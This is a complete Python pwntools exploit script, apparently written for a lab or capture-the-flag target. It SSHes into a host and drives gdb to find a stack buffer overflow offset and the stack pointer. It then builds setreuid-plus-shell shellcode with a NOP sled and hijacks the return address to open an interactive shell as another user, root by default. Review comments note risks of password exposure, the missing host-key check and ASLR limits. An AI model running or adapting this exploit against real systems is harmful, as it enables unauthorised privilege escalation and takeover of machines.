- #!/usr/bin/env python2
import argparse
import sys

from pwn import *
- ####################################
- ###CONFIG###
- ####################################
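parser = argparse.ArgumentParser(description='H4x yourself a Gibson.')
parser.add_argument('--nops', type=int, nargs='?', default=100, help='the number of nops with which to pad the shellcode')
parser.add_argument('--cyclic-length', type=int, nargs='?', default=512, help='the number of cycles to generate when autodetecting buffer size')
parser.add_argument('-gdb-command', type=str, nargs='?', default='gdb', help='the command which runs gdb on the TARGET machine')
parser.add_argument('-t', '--target-user', type=str, nargs='?', default='root', help='the user who is to be emulated with setreuid')
# NOTE(review): a password passed on the command line is visible to every local
# user through the process list and is normally kept in shell history. Prefer
# key-based auth (leave this empty) and treat the flag as lab-only convenience.
parser.add_argument('-p', '--password', type=str, nargs='?', default='', help='the password with which to ssh into the server')
parser.add_argument('host', metavar='HOST', type=str, nargs=1, help='the host to which to connect via ssh. FORMAT: username@host:port')
parser.add_argument('executable', metavar='EXECUTABLE', type=str, nargs=1, help='the executable to exploit')
parser.add_argument('-a', '--args', type=str, nargs='?', default='', help='optional arguments to pass to the provided executable')
parser.add_argument('target_function', metavar='TARGET', type=str, nargs=1, help='the function call which is to be targeted for exploitation')
args = parser.parse_args()


def _parse_host(spec):
    """Split a ``username@host:port`` string into ``(user, host, port)``.

    Raises ValueError when the user, host or port part is missing, or when
    the port is not an integer, so the caller can fall back to printing usage.
    """
    user_part, at_sep, rest = spec.partition('@')
    host_part, colon_sep, port_part = rest.partition(':')
    if not (at_sep and colon_sep and user_part and host_part):
        raise ValueError('HOST must have the form username@host:port')
    return user_part, host_part, int(port_part)


# Connection config
try:
    user, host, port = _parse_host(args.host[0])
except (IndexError, ValueError):
    parser.print_help()
    sys.exit(5)
password = args.password
# Exploit config
binary = args.executable[0]
# split() without a separator drops empty fields, so an empty --args gives []
# rather than [''] (which would hand the target a bogus empty argv entry and
# make the "set args" branch in gdb_get_attributes fire for nothing).
execargs = args.args.split()
vuln_func = args.target_function[0]
target_user = args.target_user
# GDB config
gdb_path = args.gdb_command
cyclic_length = args.cyclic_length
# Shellcode config
num_nops = args.nops
# Context config: the shellcode, p64() packing and the +8 saved-rbp skip in the
# probes all assume x86-64 Linux.
context.arch = 'amd64'
context.os = 'linux'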
- ####################################
- ###Functions###
- ####################################
def gdb_get_attributes(gdb_proc):
    """Drive a fresh gdb session on the target binary and collect exploit parameters.

    Waits for the first prompt, applies the run-time arguments (``execargs``),
    removes the LINES/COLUMNS variables gdb exports into the inferior's
    environment (they shift the stack relative to a run outside gdb), plants a
    breakpoint on the first instruction of ``vuln_func`` and then hands the
    session to the two probe helpers.

    Returns a dict with ``buf_size`` (offset from input start to the saved
    return address) and ``stack_pointer`` ($rsp at the breakpoint).
    """
    def command(line):
        # Every command is followed by a wait for the next prompt so the
        # probes below start from a clean read buffer.
        gdb_proc.sendline(line)
        gdb_proc.recvuntil('(gdb)')

    gdb_proc.recvuntil('(gdb)')
    if execargs:
        command('set args ' + ' '.join(execargs))
    for setup in ('unset env LINES', 'unset env COLUMNS', 'break * ' + vuln_func):
        command(setup)
    # Order matters: the buffer probe leaves the inferior stopped after its
    # crash and the pointer probe answers gdb's restart confirmation.
    buf_size = get_vuln_buffer_size(gdb_proc)
    stack_pointer = get_vuln_stack_pointer(gdb_proc)
    return {'buf_size': buf_size, 'stack_pointer': stack_pointer}
def get_vuln_buffer_size(gdb_proc) -> int:
    """Crash the target with a cyclic pattern and derive the return-address offset.

    The session must already be stopped at the ``vuln_func`` breakpoint set by
    ``gdb_get_attributes``.  The pattern is sent in reply to the hard-coded
    'Enter the administrator password:' prompt, so this probe only works for
    a target that prints exactly that string.  After the crash the two 32-bit
    words at $rbp are re-encoded and located inside the pattern; the saved-rbp
    slot is 8 bytes on amd64, so the return address sits 8 bytes further on.

    Assumes $rbp still points into the overflowed frame when gdb regains
    control (the crash happens before ``leave``/``ret``); if instead the
    corrupted return address itself faults, $rbp holds pattern bytes and the
    ``x/2x`` read fails -- TODO confirm against the target.

    Returns the offset from the start of the input to the return address.
    """
    print('Building cyclic pattern to calculate shellcode injection length.')
    pattern = cyclic_metasploit(cyclic_length)
    gdb_proc.sendline('run')
    gdb_proc.recvuntil('(gdb)')
    # The breakpoint is on the function's first instruction; step once and
    # then wait for the program's own input prompt.
    gdb_proc.sendline('nexti')
    gdb_proc.recvuntil('Enter the administrator password:')
    gdb_proc.sendline(pattern)
    gdb_proc.recvuntil('(gdb)')
    gdb_proc.sendline('x/2x $rbp')
    rbp_pattern = gdb_proc.recvuntil('(gdb)')
    print(rbp_pattern)
    # gdb prints "<addr>:\t<word>\t<word>"; drop the address column and parse
    # the words (base auto-detected from the 0x prefix).
    words = [int(w, 0) for w in rbp_pattern.split('\n')[0].split('\t')[1:]]
    chars = ''.join([pack(w, 32, 'little', True) for w in words])
    print('Found pattern ' + chars + ' in rbp.')
    size = cyclic_metasploit_find(chars)
    print('Detected a buffer size of ' + hex(size) + ' bytes.')
    # +8 skips the saved rbp to land on the return address (amd64).
    offset = size + 0x8
    print('Final offset is ' + hex(offset) + ' bytes.')
    return offset
def get_vuln_stack_pointer(gdb_proc):
    """Restart the inferior under gdb and read $rsp at the ``vuln_func`` breakpoint.

    Sends ``run`` and immediately answers ``y`` to gdb's "start it from the
    beginning?" confirmation (the preceding probe leaves the program stopped
    after its crash), waits for the breakpoint, then parses the address column
    of ``x $rsp`` ("<addr>:\\t<value>").

    Caveat: gdb disables address-space randomisation for the inferior by
    default, so this value only matches a run outside gdb if ASLR is off on
    the target as well; the NOP sled built in stage 2 absorbs only small
    differences.

    Returns the stack pointer as an int.
    """
    print('Detecting stack pointer.')
    for line in ('run', 'y'):
        gdb_proc.sendline(line)
    gdb_proc.recvuntil('(gdb)')
    gdb_proc.sendline('x $rsp')
    reply = gdb_proc.recvuntil('(gdb)')
    first_line = reply.split('\n')[0]
    addr_column = first_line.split('\t')[0]
    rsp_addr = int(addr_column[:-1], 0)  # drop the trailing ':'
    print('Stack pointer found at address ' + hex(rsp_addr) + '.')
    return rsp_addr
- ####################################
- ###Main###
- ####################################
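# NOTE(review): no host-key verification is configured for this ssh() call, so
# a man-in-the-middle on the path to HOST could capture the password and the
# payload -- confirm the host key out of band before using this outside a lab.
conn = ssh(user=user, password=password, host=host, port=port)
print('''
--------------------------------------
STAGE 1: BEGINNING EXPLOIT AUTOCONFIGURATION
--------------------------------------
''')
# Grab information from debugging the vuln binary.
gdb_proc = conn.process(argv=[gdb_path, binary])
try:
    attributes = gdb_get_attributes(gdb_proc)
finally:
    # Do not leave gdb (and its stopped inferior) running on the target if a probe fails.
    gdb_proc.close()


def _lookup_uid(passwd_data, name):
    """Return the numeric uid of ``name`` from /etc/passwd text, or None if absent.

    Blank and comment lines are skipped.  A malformed record for the target
    user raises ValueError instead of being ignored.
    """
    for line in passwd_data.split('\n'):
        if not line or line.startswith('#'):
            continue
        fields = line.split(':')
        if fields[0] == name:
            return int(fields[2])
    return None


# Grab information from the filesystem.
print('Attempting to grab user id for target user \'' + target_user + '\'.')
uid = _lookup_uid(conn.download_data('/etc/passwd'), target_user)
if uid is None:
    # Previously an unknown user silently fell through to uid 0 (root).
    print('Target user \'' + target_user + '\' was not found in /etc/passwd on the target.')
    sys.exit(6)
print('Using UID ' + str(uid) + '.')
print('''
--------------------------------------
EXPLOIT AUTOCONFIGURATION COMPLETE
--------------------------------------
''')
print('''--------------------------------------
STAGE 2: GENERATING SHELLCODE
--------------------------------------
''')
# setreuid() to the looked-up uid only has an effect if the target binary runs
# with that user's privileges (e.g. it is setuid to them). The uid was
# previously hard-coded to 1002, ignoring the /etc/passwd lookup above.
shellcode = asm(shellcraft.setreuid(uid)) + asm(shellcraft.sh())
print(disasm(shellcode))
shellcode = (asm('nop') * num_nops) + shellcode
# The payload must fill the buffer exactly so that p64(entry_point) lands on
# the saved return address; a fixed minimum padding (the old max(..., 8))
# misaligns it whenever the sled plus shellcode comes within 8 bytes of the
# buffer size or exceeds it.
slack = attributes['buf_size'] - len(shellcode)
if slack < 0:
    print('Shellcode with sled (' + hex(len(shellcode)) + ' bytes) does not fit the '
          + hex(attributes['buf_size']) + '-byte buffer; lower --nops.')
    sys.exit(7)
shellcode += asm('nop') * slack
print('\nPadded shellcode length: ' + hex(len(shellcode)) + ' bytes.')
# Aim for the middle of the sled so a small error in the stack address still
# lands on NOPs.
# NOTE(review): $rsp was sampled on the first instruction of the target
# function, i.e. it points at the saved return address, not at the input
# buffer -- whether the sled really lives at rsp + num_nops/2 depends on the
# target's frame layout; verify on the target.
entry_point = attributes['stack_pointer'] + (num_nops // 2)
print('Guessed entry point: ' + hex(entry_point) + '\n')
shellcode += p64(entry_point)
if b'\n' in shellcode:
    # The payload is delivered with sendline(); a line-oriented read on the
    # target would stop at this byte and truncate the exploit.
    print('WARNING: payload contains a newline (0x0a) byte and may be truncated by the target.')
print(hexdump(shellcode))
print('''
--------------------------------------
SHELLCODE GENERATION COMPLETE
--------------------------------------
''')
print('''--------------------------------------
STAGE 3: ATTEMPTING EXPLOIT
--------------------------------------
''')
# Seconds to wait for a shell prompt before declaring the attempt failed.
SHELL_TIMEOUT = 10
vuln_proc = conn.process(argv=[binary] + execargs)
vuln_proc.sendline(shellcode)
# Bounded wait: if the payload crashed the target instead of spawning a shell,
# an unbounded recvuntil would hang here forever. pwntools returns an empty
# string when the timeout expires.
if not vuln_proc.recvuntil('$ ', timeout=SHELL_TIMEOUT):
    print('No shell prompt within ' + str(SHELL_TIMEOUT) + 's; the exploit probably crashed the target.')
    vuln_proc.close()
    sys.exit(8)
vuln_proc.sendline('whoami')
whoami_result = vuln_proc.recvuntil('$ ').split('\n')[0]
if whoami_result == target_user:
    print('You got the shell :D')
    vuln_proc.sendline('cd /home/' + target_user)
else:
    print('Something went wrong. You got the shell, but are the wrong user D:')
vuln_proc.interactive(prompt = pwnlib.term.text.bold_red('\x08 \x08\x08 \x08' + whoami_result + '@' + host) + ':# ')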